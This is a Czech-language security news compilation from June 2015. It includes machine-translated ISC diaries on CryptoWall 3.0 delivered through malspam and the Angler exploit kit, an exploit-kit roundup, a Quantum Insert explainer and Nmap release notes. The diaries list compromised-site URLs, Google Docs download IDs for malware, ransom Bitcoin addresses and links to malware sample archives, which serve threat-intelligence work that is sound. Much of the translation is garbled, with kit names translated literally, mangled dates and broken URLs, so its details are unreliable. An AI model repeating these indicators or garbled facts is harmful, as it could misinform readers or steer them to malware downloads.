Tyto technologie nově doplňují další vrstvy ochrany jako Pokročilá kontrola paměti, Exploit Blocker a Anti-Phishing. Novinkou je také podpora využití cloudové databáze hrozeb LiveGrid.

Přehled inovací v Mail Security 6 pro Microsoft Exchange podle dodavatele:

Pokročilá kontrola paměti monitoruje chování škodlivých procesů a kontroluje je ihned po rozbalení v paměti. Proto je schopná detekovat i těžce šifrované hrozby.
Exploit blocker chrání aplikace jako např. internetové prohlížeče, čtečky PDF, poštovní klienti nebo aplikace MS Office před zneužitím jejich bezpečnostních chyb.
Anti-Phishing chrání počítač před pokusy získat citlivé informace uživatele jako jsou hesla, bankovní data nebo údaje o kreditních kartách. Technologie Anti-Phishing jednak porovnává požadované URL s databází phishingových stránek, jednak obsahuje algoritmy, které kontrolují grafické zobrazení stránek s cílem odhalit falešné stránky od pravých.
Cloudová databáze hrozeb LiveGrid umožňuje efektivně detekovat škodlivý kód ještě před tím, než je vydána nová aktualizace virové databáze.
Správa lokální karantény nabízí lepší kontrolu nevyžádaných zpráv pomocí samostatného webového rozhraní.
Automatické výjimky - program automaticky detekuje role serveru a aplikace třetích stran, které mohou způsobovat konflikt s antivirovým jádrem. Citlivé soubory a složky jsou vyloučeny z rezidentní kontroly.
Nová pravidla pro nakládání se zprávami umožňují upravit práci se zprávami na základě jejich vlastností a mnoha podmínek. Pravidla se uplatňují zvlášť pro transportního agenta
a zvlášť pro databázi.
Nové uživatelské rozhraní a pokročilé nastavení rozdělené do jednotlivých částí.
Důležité informace na jednom místě - všechny protokoly důležité pro sledování aktivity serveru a odstranění problémů jsou přístupné přímo z hlavního okna na jedno kliknutí.
Instalace s výběrem jednotlivých komponent umožňuje nainstalovat jen požadované části produktu.


Zvýšení CryptoWall 3.0 od škodlivého spamu a Rybář využívat kit

11.6.2015 Viry
Úvod

Od pondělka 2015-05-25 (něco více než 2 týdny), jsme viděli velké množství CryptoWall 3,0 ransomware od škodlivého spamu ( malspam ) a rybář exploit kit (EK).

Malspam kampaň tlačí CryptoWall 3,0 začala již v pondělí 2015-05-25, ale to má od pondělka 06.08.2015 výrazně zvýšil. CryptoWall 3.0 tlak od rybář EK se zdá k začali kolem stejného času. Obě kampaně (malspam a rybář EK) byl aktivní jako v poslední době, jako středy 06.10.2015.

Načasování těchto kampaní naznačuje, že by mohly být v souvislosti a eventuálně zadá stejným herce.

Níže je uveden vývojový diagram ukazují cestu, na infekci z každého z těchto akcí:

Nahoře: Cesta 1 ukazuje infekce řetěz z malspam - Path 2 ukazuje infekční řetězec od rybář EK.

CryptoWall 3.0 z malspam

Tato kampaň byla pomocí Yahoo e-mailové adresy poslat malspam. Dosud všechny přílohy byly pojmenované my_resume.zip . První týden této kampaně, materiálu extrahovaného z zip příloh byly všechny soubory HTML s názvem my_resume.svg. V té době, CryptoWall 3.0 ransomware byl stažen ze serveru ohrožena. Tento týden, extrahované názvy souborů HTML používat náhodná čísla, s názvy jako resume4210.html nebo resume9647.html . Kromě toho, CryptoWall nyní hostuje na různých docs.google.com URL.

Nahoře: některé z e-mailů vidět počínaje 2015-05-25 prostřednictvím 6.8.2015.



Nahoře: příklady škodlivého spamu.

Otevření přílohu a extrahování souboru škodlivého vám dává dokument HTML. Příklad je uveden níže:


Nahoře: příklad souboru HTML uvnitř zip příloh z malspam.

Zde jsou některé z adres URL ze souborů unzip-ed HTML ve středu 06.10.2015:

arosit.dk - GET /wp-content/plugins/revslider/temp/update_extract/resume/resume.php?id=288
arosit.dk - GET /wp-content/plugins/revslider/temp/update_extract/resume/resume.php?id=296
arosit.dk - GET /wp-content/plugins/revslider/temp/update_extract/resume/resume.php?id=490
arosit.dk - GET /wp-content/plugins/revslider/temp/update_extract/resume/resume.php?id=609
boerie.co - GET /wp-content/plugins/revslider/temp/update_extract/resume/resume.php?id=161
boerie.co - GET /wp-content/plugins/revslider/temp/update_extract/resume/resume.php?id=191
boerie.co - GET /wp-content/plugins/revslider/temp/update_extract/resume/resume.php?id=579
interestingengineering.net - GET /wp-content/plugins/revslider/temp/update_extract/resume/resume.php?id=177
interestingengineering.net - GET /wp-content/plugins/revslider/temp/update_extract/resume/resume.php?id=317
interestingengineering.net - GET /wp-content/plugins/revslider/temp/update_extract/resume/resume.php?id=586
interestingengineering.net - GET /wp-content/plugins/revslider/temp/update_extract/resume/resume.php?id=623
interestingengineering.net - GET /wp-content/plugins/revslider/temp/update_extract/resume/resume.php?id=861
interestingengineering.net - GET /wp-content/plugins/revslider/temp/update_extract/resume/resume.php?id=873
Pokud otevřete jeden z těchto souborů HTML, bude Váš prohlížeč generovat provoz k ohrožení serveru:

Nahoře: provoz z požadavku GET HTTP k jednomu z kompromitovaných serverech.

Návratnost provoz je gzip komprimovaný, takže nebude vidět ho v TCP proudu od Wireshark. Export text z Wireshark ukazuje, HTML, který odkazuje na sdílené dokumentu ze serveru Google:

Nahoře: HTML vrátil po požadavku GET ukazuje na docs.google.com.

Zde jsou některé z docs.google.com URL jsme viděli z provozu ve středu 06.10.2015:

(Https) docs.google.com -? GET / UC export = ke stažení & id = 0BzNnVzs5RTztV2ZrMGZTWFRnLU0
(Https) docs.google.com -? GET / UC export = ke stažení & id = 0BzNnVzs5RTztUmFCOGlteHdncWs
(Https) docs.google.com -? GET / UC export = ke stažení & id = 0BzNnVzs5RTztTnEzNnFfZktRZUk
(Https) docs.google.com -? GET / UC export = ke stažení & id = 0BzNnVzs5RTztdVU2RXZSeUlla00
(Https) docs.google.com -? GET / uc export = ke stažení & id = 0BzNnVzs5RTztczFQSWo4TWFtVnc
(Https) docs.google.com -? GET / uc export = ke stažení & id = 0BzNnVzs5RTztcklyU2dKdXRJdlE
(Https) docs.google.com -? GET / uc export = Stáhnout & id = 0BzNnVzs5RTztcDEyZEg0QkZuYms
(Https) docs.google.com -? GET / UC export = ke stažení & id = 0BzNnVzs5RTztaTNtOTJyd1hCejg
(Https) docs.google.com -? GET / UC export = ke stažení & id = 0B-HWsX8wPhPFZDk2dms3c2plZk0
(Https) docs.google.com -? GET / UC export = ke stažení & id = 0B-HWsX8wPhPFVTNpNTJneHJKazQ
(Https) docs.google.com -? GET / UC export = ke stažení & id = 0B-HWsX8wPhPFQzJsSmYtdERrZ1k
Zkoumání provoz v Wireshark, najdete vidět řetěz událostí, vedoucích z ohrožení serveru na docs.google.com:

Nahoře: Wireshark displeji jedno z požadavků dostanete na ohrožení serveru.

Spusťte stažený malware na hostitele se systémem Windows, a zjistíte, provoz, který je typický pro CryptoWall 3.0.

Nahoře: Wireshark zobrazení na některé CrytpoWall 3.0 provozu.

Bitcoin adresa pro výplatu výkupného tímto malware vzorku 16REtGSobiQZoprFnXZBR2mSWvRyUSJ3ag . Je to stejné Bitcoin adresa z předchozího vzorku nalezen ve čtvrtek 06.4.2015, kdy jsme byli poprvé oznámeno tohoto konkrétního malspam [ 1 ]. Také jsme viděli stejnou Bitcoin adresu používanou v úterý 06.09.2015 [ 2 ] spojena s další vlnou malspam následující týden.

Nahoře: dešifrovat pokyny ze vzorku CryptoWall 3.0.

CryptoWall 3.0 z rybář EK

Poprvé jsme si všiml rybář EK tlačí CryptoWall 3,0 v úterý 2015-05-26 [ 3 ]. Posta jsem deník o tom ve čtvrtek 2015-05-28 [ 4 ]. To bylo poprvé, co jsem viděla verzi 3.0 CryptoWall zaslaný Rybář. Viděl jsem předchozí verze CryptoWall od rybář, ale ne 3,0 až do této kampaně.

Moje poslední zdokumentovaný případ Angler EK vysílajícího CryptoWall 3.0 se stalo v úterý 06.9.2015 [ 5 ]. Jsme stále svědky případů, kdy CryptoWall 3.0 přišli z Rybář jak nedávno jak středě 06.10.2015.

V každém případě jsem zdokumentován, Bitcoin adresa pro výplatu výkupného byl 16Z6sidfLrfNoxJNu4qM5zhRttJEUD3XoB .

Rybář EK je stále používán jinými skupinami posílat různé malware náklad. Nicméně, vzhled CryptoWall 3,0 v Rybář od 2015-06-26 pomocí stejné Bitcoin adresa označuje toto je samostatnou kampaň specifickým herec.

Tento týden, napadené webové stránky, které přesměrovány do Rybář se kód injekčně do svých webových stránek, podobně jako následující příklad:

Nahoře: Škodlivý kód vstřikuje do stránky z oslabenou webového serveru (bodů na rybář EK).

Bezpečnostní kolega Profesionální mi oznámen toto je běžná injekční technika používaná na WordPress stránek, které byly přesměrování provozu na rybář EK.

Obrázek níže ukazuje 06.9.2015 Angler EK provoz a CryptoWall 3.0 post-infekce aktivitu, jak je vidět v Wireshark:

Nahoře: Wireshark zobrazení na rybář EK a po infekci provozu od CryptoWall 3.0.

Závěrečná slova

Načasování těchto dvou kampaních, spolu s jejich důsledné používání stejných Bitcoin adresy pro výplatu výkupného, ​​naznačují, že jsou příbuzní. Ty mohou být spuštěny na stejném herce. To je významný trend v našem současném hrozeb. Budeme nadále sledovat tuto činnost, a nahlásit případné významné změny v situaci.

Aktualizovat - čtvrtek 06.11.2015 v 01:13 UTC

Generované jsem víc Angler EK provoz na 06.11.2015 v 00:09 UTC. Tentokrát jsem dostal vzorek pomocí jinou adresu, než Bitcoin jsem viděl z předchozích Angler bázi CryptoWall 3,0 náklad. To Bitcoin adresa, 12LE1yNak3ZuNTLa95KYR2CQSKb6rZnELb , začal transakce během stejném časovém rámci jako ostatní vzorky spojené s touto kampaní.

V tomto bodě, nejsem si 100 procent jistý, že je to stejný herec za tím vším stojí CryptoWall 3.0 jsme byli svědky v poslední době. Nicméně, můj vnitřní pocit mi říká, že tato činnost je všechno souvisí s stejným hercem nebo skupiny. Načasování je příliš velká náhoda.

Dopravní a spojené malware lze nalézt na adrese:

http://malware-traffic-analysis.net/2015/06/11/2015-06-10-CryptoWall-3.0-from-malspam-traffic.pcap
http://malware-traffic-analysis.net/2015/06/11/2015-06-11-CryptoWall-3.0-from-Angler-EK-traffic.pcap
http://malware-traffic-analysis.net/2015/06/11/2015-06-11-CryptoWall-3.0-malware.zip
Zip soubor je chráněn se standardním heslem. Pokud to nevíte, e-mail admin@malware-traffic-analysis.net a zeptat se.

---
Brad Duncan
ISC Handler a bezpečnostní výzkumník u Rackspace
Blog: www.malware-traffic-analysis.net - Twitter: malware_traffic

Reference :

[1] http://malware-traffic-analysis.net/2015/06/04/index.html
[2] http://malware-traffic-analysis.net/2015/06/09/index2.html
[3] http://malware-traffic-analysis.net/2015/05/26/index.html
[4] https://isc.sans.edu/diary/Angler+exploit+kit+pushing+CryptoWall+30/19737
[5] http://malware-traffic-analysis.net/2015/06/09/index.html


Společnost Kaspersky byla napadena
10.6.2015 Incidenty

Začátkem tohoto roku zjistila společnost Kaspersky cyber narušení několika svých interních systémů. Po tomto zjištění provedla společnost kaspersky hloubkové vyšetřování. Byla nalezena nová verze škodlivého kódu Duqu. Tento nejlépe vytvoření kód byl vytvořen jednou z nejlepších skupin pro oblast APT hrozeb. Technická analýza duqu odhalila nové kolo útoků s novým a vylepšením kódem. Nejnovější název je Duqu 2.0.

V případě společnost Kaspersky Lab využil Zero-day zranitelností Windows a dalších dvou systémů. Tito systémy nebyly plně zaplátovány. Cílem tohoto útoku bylo špehovat společnost za účelem získání důležitých informací a výzkumech společnosti. Společnost nezjistila další zásahy do systémů nebo procesů. Zprava zde


Bezpečnost v chytrých městech? Vzniká expertní skupina

10.6.2015 Výzkum
Celosvětová nezisková iniciativa Securing Smart Cities má řešit kybernetickou bezpečnost v inteligentních městech.

Koncem května ji založily organizace IOActive, Kaspersky Lab, Bastille či Cloud Security Alliance a podle představitelů má širokou podporu bezpečnostních expertů. Sloužit bude jako komunikační uzel a také jako platforma pro spolupráci a sdílení informací.

Iniciativa je určena pro společnosti, vlády, sdělovací prostředky, neziskové organizace a jednotlivce po celém světě, kteří se budou podílet na vytváření, zlepšování a propagaci chytrých měst a bezpečných technologií pro moderní metropole.

Koncepty inteligentních měst jsou velmi aktuální. Mnoho organizací pracuje na jejich energetické efektivitě, pohodlí a šetrnosti k životnímu prostředí.

Daleko méně se prý ale uvažuje o jejich kybernetické bezpečnosti. Čím více IT firem je zapojeno do vytváření takovéhoto města, tím větší je potenciální riziko.

Iniciativa Securing Smart Cities usiluje o bezpečné chytré město pomocí několika aktivit:

Vzdělávání projektantů a poskytovatelů řešení pro chytrá města o důležitosti a nákladových přínosech osvědčených bezpečnostních postupů.
Spolupráce s partnery, sdílení nápadů a metodologií.
Zdůraznění přínosů a důležitosti zavedení bezpečnostních prvků již do rané fáze vývojového cyklu projektu nebo plánu.
Posílení partnerství mezi městy, poskytovateli a bezpečnostní komunitou.
Vytváření standardů, směrnic a prostředků, které pomohou zlepšit kybernetickou bezpečnost napříč všemi oblastmi souvisejícími s chytrými městy.


Apple Tlačení Vývojáři Směrem k připojení HTTPS Od Apps

10.6.2015 Zabezpečení

Apple je povzbuzující vývojáře, kteří vytvářejí aplikace pro iOS začít stěhování své aplikace na HTTPS pouze modelem co nejdříve ve snaze zmařit odposlechu na nejistých, holého textu připojení HTTP. Tento krok je ještě jeden další znamení, že hlavní internetové a technologické společnosti jsou stále odolnější vůči velkém měřítku, pasivní dohled nad jejich uživatelů. Mnoho společností, včetně Google, Microsoft, Yahoo, a jiní byli v pohybu své webové služby HTTPS ve výchozím nastavení za posledních pár let. Toto hnutí se zrychlil, neboť zveřejnění informací o metodách agentury pro národní bezpečnost pro odposlouchávání na páteřní sítě Internet a různé služby začal v roce 2013.

 V pondělí, Tony Scott, federální CIO, oznámil, že všechny federální agentury se musí přesunout své veřejné webové stránky a služby pro HTTPS pouze tím, 31.prosince 2016. Nyní, Apple je šťouchl svou obrovskou komunitu mobilních vývojářů app ve stejném směru. Worldwide Developer Conference společnosti se děje tento týden, a jako součást připravované vydání iOS 9, Apple zveřejnila některé pokyny o změnách v novém operačním systému. Součástí těchto pokynů vysvětluje zahrnutí aplikací Transport Security, protokol, který umožňuje vývojářům vynutit zabezpečené připojení k konkrétních oblastech z jejich aplikací. "App Transport Security (ATS) umožňuje aplikace přidat deklaraci do jeho Info.plist souboru, který určuje domény, se kterými potřebuje bezpečnou komunikaci. ATS zabraňuje náhodnému prozrazení, poskytuje bezpečný výchozí chování, a je snadné přijmout. Ty by měly přijmout ATS co nejdříve, bez ohledu na to, zda budete vytvářet nové aplikace nebo aktualizace stávající, "instrukce Apple říkají. Apple se nedělá využití ATS povinné pro vývojáře právě teď, ale vzhledem k tomu, jak se věci sledování trendů, které by mohly být přichází v blízké budoucnosti. Pro tuto chvíli, společnost je povzbuzující vývojářům používat ATS ve všech nových i stávajících aplikací. "Pokud vyvíjíte novou aplikaci, měli byste používat HTTPS výhradně. Pokud máte existující aplikace, měli byste používat protokol HTTPS, stejně jako si můžete hned teď, a vytvořit plán pro migraci zbytek vaší aplikace co nejdříve, "uvedla firma.


KRITICKÁ IE AKTUALIZACE JEDEN Z OSMI BULLETINECH ZABEZPEČENÍ SPOLEČNOSTI MICROSOFT

10.6.2015 Zranitelnosti

IT administrátorům dnes byly relativně lehký měsíc udělena bulletinů zabezpečení od společnosti Microsoft, který je pravděpodobně třeba uvítat vzhledem k tomu, Windows Server 2003, podpora zabezpečení končí v trochu více než měsíc. Společnost Microsoft dnes vydala osm bulletinů, dva z nich hodnotili kritická, včetně dnes již obvyklé svalnatý aktualizaci Internet Explorer.  Dva tuctu zranitelnosti byly řešeny v nejnovější kumulativní aktualizace pro IE, MS15-056 , pořádný kus těchto vad kritická v novějších verzích prohlížeče. Většina zranitelností umožňuje vzdálené spuštění kódu; jeden zveřejňování informací chyba byla veřejně známá, ale Microsoft uvedl, že si není vědoma využije ve volné přírodě. Microsoft uvedl, že veřejně známá chyba umožňuje útočníkovi přístup k historii prohlížeče uživatele; aktualizace brání historii prohlížeče před přístupem na škodlivé stránky. Vada nemá vliv na instalace Windows Serveru, protože ti běží ve výchozím nastavení Rozšířené nastavení zabezpečení, která je omezeném režimu, který snižuje šance webového obsahu prováděný na serveru. "I když by útočník mohl téměř jistě číst historii procházení po využití některého z dalších desítek zranitelností zapojená v tomto měsíci, se zdá pravděpodobné, aby mi, že zpřístupnění informací se bude snadněji zneužít než jakékoliv poškození paměti chyba," řekl Craig Young , bezpečnostní výzkumník v Tripwire.

 

Young také volá jeden z paměťových chyb, CVE-2015-1756, který je hodnocena jako důležitá společností Microsoft v MS15-060 . Chyba je zranitelnost use-after-zdarma v Microsoft společné prvky subsystému, která by mohla umožnit vzdálené spuštění kódu, pokud uživatel pracuje s nebezpečným obsahem přes IE a potom vyvolá F12 nástroje pro vývojáře v IE. "Tato chyba představuje zajímavou útoku vektor pro jít po výzkumníky využívajících Internet Explorer" Nástroje pro vývojáře "analyzovat škodlivého špatného fungování webových stránek," řekl Young. IE bulletin rovněž řeší tři zvýšení oprávnění nedostatků a dlouhý seznam korupčních paměti zranitelnosti, které umožňují útočníkovi spustit kód na počítači oběti. Druhý kritický bulletin, MS15-057 , nášivky vzdálené spuštění kódu chybu v programu Windows Media Player. Škodlivý obsah média vykonán zranitelné přehrávačem médií by mohl útočník úplnou kontrolu nad počítačem uživatele, řekl Microsoft. Bulletin je hodnocen důležité pro Windows Media Player 10 v systému Windows Server 2003, Windows Media Player 11 na Windows Vista nebo Windows Server 2008, a Windows Media Player 12 v systému Windows 7 nebo Server 2008 R2. Microsoft uvedl, že řešit, jak hráč zvládá DataObjects opravit zranitelnost. Microsoft udělal poskytly jednu řešení, která zahrnuje odstranění Wmplayer.exe z IE ElevationPolicy.

 

Zranitelnost Windows Media Player byla hlášena prostřednictvím koordinované zveřejňování zranitelnosti, řekl Microsoft, dodává, že si není vědoma veřejných útoků využívajících tuto chybu. Zbývající bulletiny jsou hodnoceny důležité společností Microsoft: MS15-059 záplaty tři souvisejících s pamětí vzdálené spuštění kódu chyby zabezpečení aplikace Microsoft Office, z nichž žádná byly veřejně využíván. MS15-061 záplaty 11 zvýšení oprávnění zranitelností ve Windows Ovladače režimu jádra. MS15-062 záplaty jedno zvýšení oprávnění Chyba zabezpečení služby Active Directory Federation Services, která by mohla vést k cross-site skriptování útoky. MS15-063 záplaty jedno zvýšení oprávnění zranitelnosti v jádře systému Windows. Útočník by musel klesnout nebezpečný DLL soubor v místním adresáři, který by být provedeny programem načítání knihovny. MS15-064 záplaty tři Zvýšení úrovně oprávnění zranitelnosti v Microsoft Exchange Server 2013. Jedna z chyb je server-side žádost padělek vada, zatímco jiný je cross-site vydání požadavku padělání. Finále chyba je injekce HTML chyba vede k zpřístupnění informací. Společnost Microsoft také vydala dvě samostatné bezpečnostní informační zprávy, z nichž jedna aktualizace Flash Player v aplikaci Internet Explorer , řešení bezpečnostních zranitelností již opravené Adobe dříve v den, zatímco ostatní aktualizace Juniper Networks Windows V balení Junos Pulse Client for Windows 8.1 a 8.1 RT . Junos Pulse je VPN dodáván s Windows 8.1 a novější. Aktualizace záplaty tzv Freak zranitelnost a další otázky OpenSSL v Junos Pulse


Quantum Insert attack

8.6.2015 Počítačový útok
Holandská společnost Fox-IT odhalila podrobné informace o kvantové Vložit útoku. "Je zvolena" HTML přesměrování "útok vstřikováním škodlivý obsah do určité relace TCP. Relace pro injekce na základě" selektory ", jako je trvalé sledování cookie, který identifikuje uživatele pro delší časové období."

Útok lze provést čichání požadavkem HTTP pak útočník bude falešnou si vytvořenou odpověď HTTP. Aby se řemeslu falešnou odpověď HTTP útočník by měl vědět následující:

Zdrojová a cílová IP adresa
Zdrojový a cílový port TCP
Pořadové číslo a potvrzení
Jakmile je paket falešnou spor dojde, pokud útočník vyhrát závod pak on / ona by odpověď na oběti se škodlivým obsahem, místo legitimního jeden.

Provedení Quantum Insert útok vyžaduje, aby útočník může sledovat provoz a mají velmi rychlou infrastrukturu, vyhrát závod podmínku.

Chcete-li zjistit Quantum Vložit bychom se měli podívat na následující:

Duplicitní pořadové číslo s dvěma různými náklad, protože útočník zfalšovat odpověď, oběť bude mít dva pakety se stejným pořadovým číslem, ale s různou užitečného zatížení.
TTL anomálie, Falešná pakety by ukazují jiný čas žít hodnotu, než skutečné pakety. TTL jiný může být legitimní vzhledem k povaze internetového provozu ale vzhledem k tomu, že útočník bude blíže k cíli vyhrát spor, které by mohly dát neobvyklé liší v TTL mezi legitimní pakety a podvodného jeden.
==========================================

http://blog.fox-it.com/2015/04/20/deep-dive-into-quantum-insert/


Nmap 6.49BETA1 propuštěn

5.6.2015 Software

Fjodor oznámila vydání Nmap 6.49BETA1.This verze bude mít stovky zlepšení, včetně:
Integrovaný všechny nejnovější detekce OS a detekce podání verze / služeb (včetně IPv6)
Zlepšení infrastruktury: oficiální bug tracker
Přidané možnosti --Datové a --Datové-string poslat custom užitečné zatížení v prověřování paketů dat.
25 nových NSE skriptů (celkem je nyní 494):
o BACnet-info dostane informace o zařízení, ze SCADA / ICS zařízení přes BACnet (Building Automation and Control Networks)

o docker-verze rozpozná a otisky prstů Docker
o enip-info dostane informace o zařízení ze SCADA / ICS zařízení přes Ethernet / IP
o fcrdns provádí Výhledová potvrdil Reverse DNS vyhledávání a zprávy anomální výsledky
O http-Avaya-ipoffice uživatele výčet uživatelů v Avaya 7.x systémy IP Office.
o http-Cisco AnyConnect dostane verzi a tunelů informace od Cisco SSL VPN
o http-crossdomainxml detekuje příliš tolerantní politiku crossdomain a najde důvěryhodné doménových jmen k dispozici pro nákup
O http-Shellshock rozpozná webové aplikace citlivé na Shellshock ( CVE-2014 do 6271).
o http-vuln-cve2006-3392 zneužívá zveřejňování souboru chybu zabezpečení v Webmin.
o http-vuln-cve2014-2126, http-vuln-cve2014-2127, http-vuln-cve2014-2128 a http- vuln-cve2014-2129 detekci specifických zranitelnosti v Cisco AnyConnect SSL VPN
o http-vuln-cve2015-1427 rozpozná servery ElasticSearch zranitelné ke vzdálenému spuštění kódu.
o http-vuln-cve2015-1635 detekuje systémy Microsoft Windows náchylné k MS15-034
o http- vuln-neštěstí-cookie rozpozná "Neštěstí Cookie" zranitelnost v Allegro RomPager 4,07, běžně používané v SOHO routery pro TR-069 přístupem.
o http-WordPress-plugins byl přejmenován na http-wordpress-výčet a rozšířena na výčet jak pluginy a témata Wordpress zařízení a jejich verze. http-WordPress-ENUM je nyní http-WordPress-uživatelé.
o MikroTik-RouterOS-brute provádí auditování heslo útoky proti Mikrotik je RouterOS API.
o Omron-info dostane informace o zařízení od společnosti Omron PLC pomocí ploutví služby.
o S7-info dostane informace o zařízení od Siemens PLC prostřednictvím služby S7, tunelových přes ISO-TSAP na TCP portu 102.
o snmp-info dostane číslo podniku a ostatní informace z snmpEngineID v paketu s odpovědí SNMPv3.
o ssl-CCS-vstřikování zjišťuje, zda server je zranitelný na SSL / TLS injekce CCS zranitelností (CVE-2014-0224)
o ssl-poodle detekuje pudl chybu v SSLv3 (CVE-2014-3566)
o supermicro-IPMI-conf využívá řadiče Supermicro IPMI / BMC.
O cíle, ipv6- map4to6 generuje cílové adresy IPv6, které odpovídají IPv4 adresy mapované v rámci konkrétního IPv6 podsítě.
O cíle-ipv6-wordlist generuje cíl IPv6 adres z seznamu slov z hexadecimálních znaků

================================================== =====================================

http://seclists.org/nmap-announce/2015/2


Exploit Kit Roundup - začátkem června 2015

4.6.2015 Exploit
Úvod 

Security Operation Center (SOC) analytici zkoumat záznamy o podezřelé činnosti v síti. Je však možné, že tito analytici nesmí narazit exploit kit (EK), doprava, která často. Web Gateway organizace může zastavit velké množství špatných provozu předtím, než se zobrazí plný infekce řetězec. Vyšetřování jiných typů podezřelé aktivity bude pravděpodobně trvat až většinu analytika pracovního dne.

Někteří z nás mají to štěstí, aby přezkoumala EK provoz na rutinní bázi. Co tím na mysli, chci sdílet příklady nejčastější využití souprav Všiml jsem si zatím v tomto roce.

V pořádku, EK dopravní jsem viděl nejčastěji v roce 2015 bylo:

Rybář
Slavnost
Nukleární
Neutrino
Rozsah
Takeláž
Toto není úplný seznam. Ostatní využívají soupravy jsou venku, ale ty jsou nejčastější, které jsem viděl v letošním roce. Nemám žádné tvrdé čísla, a poslední čtyři (Nuclear, neutrino, velikosti, a Rig), jsou více o kvalifikovaný odhad na žebříčku. EK scéna může vyvíjet docela rychle. Seznam bude pravděpodobně změní během několika měsíců, a moje pozorování jsou jen názor jednoho člověka.

Rybář EK

Rybář je nejčastější exploit kit jsem se běžet napříč. Je to také nejpokročilejší. Rybář se mění vzory adres URL se často, a tyto změny se v poslední době stalo na blízko-denní bázi. Rybář začal používat "fileless" infekce techniky v roce 2014 [ 1 ], a to teď posílá jeho užitečné zatížení v poměrně sofistikované šifrované způsobem (což znamená, že nepoužívá přímou vpřed ASCII řetězec XOR užitečné zatížení, když je poslal přes HTTP). V posledních měsících jsem měl tvrdý čas získávání užitečné zatížení z rybář EK. V příkladu tohoto deníku, jsem nebyl schopen získat nebo dešifrovat užitečné zatížení.

Dříve, viděl jsem rybář odeslání nějakou formu ransomware jako TeslaCrypt / Alpha Crypt variant [ 2 ] nebo CrytoWall 3.0 [ 3 ]. V posledních několika dnech, jsem hlavně viděl Bedep a souvisejících náklad zaslané Rybář.

Příkladem Angler EK dopravy na 06.3.2015: klikněte zde pro soubor pcap.

Nahoře: Rybář EK provozu a po infekci činnosti ve středu 06.3.2015 .

Fiesta EK

Fiesta je pravděpodobně příští nejobvyklejší činem kit jsem přeběhnout, většina z nich souvisí s hercem BizCN který jsem popsal v předchozím deníku [ 4 ]. Ostatní herci samozřejmě použít tento exploit kit. Jako rybář EK, Fiesta také používá při odesílání malware náklad sofistikovanější typ šifrování. Naštěstí můžu obvykle chytit kopii užitečného zatížení z infikovaného hostitele v mé laboratoři nebo dešifrovat užitečného zatížení v případě potřeby.

Příklad 1 Fiesta EK dopravy na 06.3.2015: klikněte zde pro soubor pcap.
Příklad 2 Fiesta EK provozu na 06.3.2015: c lic K sem pro th e pcap souboru.

Nahoře: Fiesta EK provoz ve středu 06.3.2015.

Velikost EK

Velikost EK často vysílá několik náklad, někdy i 6 nebo více. Je to velmi hlučný exploit kit. Budu často vidět CryptoWall 3.0 jako jednu z uživatelských dat. V příkladu tohoto deníku, Velikost poslal pouze jednu užitečného zatížení, a to bylo CryptoWall 3.0. Já jsem obvykle vidět Rozsah EK zaslat malware náklad nezašifrované, alespoň při použití IE 8 jako webový prohlížeč v zranitelné hostiteli. Nevidím Magnitude dnes stejně jako jsem to udělal minulý rok.

Příkladem velikosti EK dopravy na 06.3.2015: klikněte zde pro soubor pcap.

Nahoře: velikost EK provozu a po infekci činnosti ve středu 06.03.2015.

Neutrino EK

V roce 2014, to exploit kit zmizelo asi šest měsíců a pak se vrátil do hodně jiné formě [ 5 ]. Dopravní vzory zůstaly relativně beze změny, protože se objevil v pozdní 2014. Neutrino EK používá sofistikovanější styl šifrování při odesílání malware užitečné zatížení (ne pouze přímočarý XOR pomocí ASCII řetězce).

Současné URL vzory neutrino je připomínat lidem Sweet Orange EK; Nicméně, Sladké Orange Zdá se, že zmizel ze scény již v únoru 2015. Nenašel jsem žádnou sladkého pomeranče po únoru, ale viděl jsem spoustu Neutrino od té doby. Pokud vidíte nedávný provoz si myslíte, že je sladká Orange, dvakrát zkontrolovat. Je to pravděpodobně Neutrino EK.

Neutrino byla poměrně konzistentní v posledních několika měsících. Neviděl jsem hodně, ale nikdy to pryč.

Příkladem Neutrino EK dopravy na 06.3.2015: klikněte zde pro soubor pcap.

Nahoře: Neutrino EK provoz ve středu 06.3.2015.

Jaderná EK

V loňském roce, to exploit kit zdál mnohem častější, než je tomu dnes. Provoz Windigo stále používá jaderné EK [ 6 ], ale v posledních týdnech, jsem málokdy viděl jaderné mimo to. Jaderná EK zatemňuje jeho užitečné zatížení o XOR-ing s ASCII řetězcem.

Příkladem jaderné EK dopravy na 06.3.2015: klikněte zde pro soubor pcap.

Nahoře: Jaderná EK provozu a po infekci činnosti spojené s provozem Windigo ve středu 06.3.2015.

Rig EK

Když Rig se poprvé objevil v roce 2014, to vypadalo pozoruhodně podobný do nekonečna EK [ 7 ] (který byl poprvé identifikován jako Goon EK). Rig EK prý půjčil hodně z nekonečna. I když jsem neviděl Nekonečno v tomto roce, jsem rozhodně běžet napříč vybavit každý jednou za čas.

V dubnu 2015 Rig EK změnila šifrování, kterou používá k odeslání malware užitečné zatížení. Nyní, to používá stejnou metodu jako jaderné EK, plést jeho užitečné zatížení o XOR-ing s ASCII řetězcem [ 8 ].

Příkladem Rig EK dopravy na 06.03.2015: klikněte zde pro soubor pcap.

Nahoře: Rig EK provoz ve středu 06.03.2015.

Závěrečná slova

Jak již bylo zmíněno, je to jen názor jednoho člověka do současného stavu využití výstroje. Není to komplexní, a tam jsou jiné exploit kity Nemám viditelnost. Zde je seznam pcap souborů z předchozích odstavcích:

http://malware-traffic-analysis.net/2015/06/03/2015-06-03-Angler-EK-traffic.pcap
http://malware-traffic-analysis.net/2015/06/03/2015-06-03-Fiesta-EK-traffic-example-01.pcap
http://malware-traffic-analysis.net/2015/06/03/2015-06-03-Fiesta-EK-traffic-example-02.pcap
http://malware-traffic-analysis.net/2015/06/03/2015-06-03-Magnitude-EK-traffic.pcap
http://malware-traffic-analysis.net/2015/06/03/2015-06-03-Neutrino-EK-traffic.pcap
http://malware-traffic-analysis.net/2015/06/03/2015-06-03-Nuclear-EK-traffic-Operation-Windigo.pcap
http://malware-traffic-analysis.net/2015/06/03/2015-06-03-Rig-EK-traffic.pcap
Také jsem, kde jsem mohl shromážděny využije a malware náklad. ZIP soubor s této kolekce je k dispozici na adrese:

http://malware-traffic-analysis.net/2015/06/03/2015-06-03-malware-samples.zip
Zip soubor je chráněn heslem se standardním heslem. Pokud to nevíte, e-mail admin@malware-traffic-analysis.net a zeptat se.

---
Brad Duncan
ISC Handler a bezpečnostní výzkumník u Rackspace
Blog: www.malware-traffic-analysis.net - Twitter: malware_traffic

Reference :

[1] http://malware.dontneedcoffee.com/2014/08/angler-ek-now-capable-of-fileless.html
